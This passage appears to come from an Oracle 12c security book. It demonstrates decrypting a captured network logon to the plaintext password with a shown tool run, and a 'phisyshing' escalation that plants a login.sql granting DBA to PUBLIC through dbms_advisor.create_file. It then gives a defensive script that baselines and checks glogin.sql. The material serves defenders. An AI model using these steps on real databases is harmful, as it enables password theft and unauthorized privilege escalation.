Note that the chooser/magic number and key are likely to change with each release, so the above should be taken only as evidence that DB link passwords can still be decrypted in 12c, and therefore that it is essential to defend against any user who has obtained the privilege to read DB link password ciphertext.
Defense and forensic response to this threat in 12c is the subject of the following chapter; first, though, what about network
authentication decryption in 12c?
Network Authentication Decryption in 12c
Because the password hash (the shared secret between client and server) is used as an input to the encryption of the network
authentication session, an attacker who obtains the hash can decrypt a captured logon exchange back to the plaintext password. This is why Oracle
12c removes sys.user$ from the scope of SELECT ANY DICTIONARY. The following demonstration shows that, given the password hash and the values captured from the session, Laszlo's oradecrypt12c tool can also recover the logon password from a 12c network authentication session:
root@orlin $ ./oradecrypt12c \
  -s E0E2E8A644437AF1AF826BDA694F788888D2CF36E11D83B08794AFE86B11FC26B156847707A90CFED7EFC4255AD2B3BF \
  -c 02D999F2C6025C9917F82D895626FFAF12F8749AE658450961F4654956A0D731EFD1DEF66096FA6A50DC3627768AC617 \
  -a 270862B29FC8C613C315CF1F7E3E9C07428F2058383A748827770489165F5E08 \
  -h 492976D589156D42A26FBC1A4A5A42FA3F332F0EA031B4F508159B81FF940B71BC2DEA6D0AF16FEA1A15116B261D3B146FE49D5C34D049DD11EC422611F85A2C1BAF25A4E229BD232B13B0437BD42DE4
The AUTH_SESSKEY server is:
A2505EB919AE4AFB33AFFF3C647DBE39E2DEEE656CC164E69CBE73D11AE5690B945C559E165E3A88A6ACE7955AF15
The AUTH_PASSWORD encryption key is:
5DC1AE2D4C083ABEB49207598C35D447DBAF3BE74E9140567D931C6CE47EEC
The password is: Test1234
EA619641CFF531EB5327EC7E73F43CE54657374313233348888888898982993E00000000000D8F82993E00018186DEFF7F00
This session decryption threat is mitigated by encrypting the network connection, either with Advanced Security Option (ASO) TCPS (SSL/TLS) or with native network encryption. Network encryption is free of
charge in 12c (and in lower versions) but is not enabled by default. The recommendation of this chapter is to make
enabling one of the two a priority, in order to protect the DBSNMP Cloud Control connections in particular: a captured DBSNMP logon on an unencrypted connection would otherwise yield that password. More on this in Chapter 14.
Phishing for SYSDBA
Phishing for SYSDBA privileges, or "phisyshing" as it has just been named, is another slant on privilege escalation: the
ambitious user arranges for a DBA's own authorized privileges to execute code the user has planted. For example, using a
directory object conveniently provided by the default 12c install:
exec dbms_advisor.create_file ('grant dba to public;', 'OPATCH_SCRIPT_DIR','login.sql');
Any invocation of SQL*Plus with the filesystem directory behind OPATCH_SCRIPT_DIR as its working directory will automatically run the SQL contained in
that login.sql, after the global glogin.sql:
/home/oracle/app/oracle2/product/12.1.0/dbhome_2/sqlplus/admin/glogin.sql
It is imperative for DBAs to check the contents of any local login.sql as well as the global glogin.sql, to record a
known-good SHA-1 of glogin.sql and compare against it regularly, and preferably to leave it with read-only *nix permissions. Note that the
attack relies on the 12.1 behaviour shown here; from 12.2 onward SQL*Plus no longer reads login.sql from the current working directory, only from the ORACLE_PATH/SQLPATH search list, which should still be checked.
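The following shell script is an added example, not code from the book: it records the SHA-1 of the global glogin.sql, verifies both the hash and the *nix permissions later, and lists any login.sql that SQL*Plus would run from a given working directory or search path. It assumes the 12.1 layout ($ORACLE_HOME/sqlplus/admin/glogin.sql), GNU coreutils (sha1sum, stat -c) with shasum and stat -f as fallbacks, and search-path entries without spaces; the throwaway ORACLE_HOME it builds is constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the book): baseline the global glogin.sql, verify it
# later, and list any login.sql that SQL*Plus would run from the working
# directory or the ORACLE_PATH/SQLPATH search list. Assumes a 12.1 ORACLE_HOME
# layout ($ORACLE_HOME/sqlplus/admin/glogin.sql), GNU coreutils (sha1sum,
# stat -c) with shasum/stat -f fallbacks, and search-path entries without spaces.

# SHA-1 hex digest of file $1.
sha1_of() {
    if command -v sha1sum >/dev/null 2>&1; then sha1sum "$1"; else shasum -a 1 "$1"; fi \
      | awk '{print $1}'
}

# Store the known-good digest of $1/sqlplus/admin/glogin.sql in baseline file $2.
# Keep the baseline somewhere the oracle software owner cannot write to.
baseline_glogin() {
    sha1_of "$1/sqlplus/admin/glogin.sql" > "$2"
}

# Return 0 if glogin.sql under ORACLE_HOME $1 still matches baseline $2 and is
# not writable by group or other; otherwise print the finding and return 1.
verify_glogin() {
    f="$1/sqlplus/admin/glogin.sql"
    rc=0
    if [ "$(sha1_of "$f")" != "$(cat "$2")" ]; then
        echo "CHANGED: $f does not match the recorded SHA-1"
        rc=1
    fi
    mode=$(stat -c '%a' "$f" 2>/dev/null || stat -f '%Lp' "$f")
    grp_oth=${mode#"${mode%??}"}          # last two octal digits: group, other
    case "$grp_oth" in
        *[2367]*) echo "WRITABLE: $f has mode $mode (group/other write bit set)"; rc=1 ;;
    esac
    return $rc
}

# Print every login.sql that a SQL*Plus started in directory $1 with search
# path $2 (colon-separated, as ORACLE_PATH) would execute on startup.
stray_login_sql() {
    for d in "$1" $(printf '%s' "$2" | tr ':' ' '); do
        [ -f "$d/login.sql" ] && echo "$d/login.sql"
    done
    return 0
}

# Constructed demo: a throwaway ORACLE_HOME with a clean glogin.sql, plus a
# directory holding the planted login.sql from the text.
demo_home=$(mktemp -d)
mkdir -p "$demo_home/sqlplus/admin" "$demo_home/scriptdir"
printf 'set sqlprompt "_user@_connect_identifier> "\n' > "$demo_home/sqlplus/admin/glogin.sql"
chmod 644 "$demo_home/sqlplus/admin/glogin.sql"
printf 'grant dba to public;\n' > "$demo_home/scriptdir/login.sql"

baseline="$demo_home/glogin.sha1"
baseline_glogin "$demo_home" "$baseline"
if verify_glogin "$demo_home" "$baseline"; then echo "glogin.sql OK"; fi
echo "login.sql files a DBA would run from $demo_home/scriptdir:"
stray_login_sql "$demo_home/scriptdir" "$demo_home/sqlplus/admin:/nonexistent"
```

In production, run baseline_glogin once from a trusted state and schedule verify_glogin; any CHANGED or WRITABLE line is an incident, since both files execute with whatever privilege the DBA connects with, SYSDBA included. The stray_login_sql check is what catches the planted file before the DBA starts SQL*Plus in that directory.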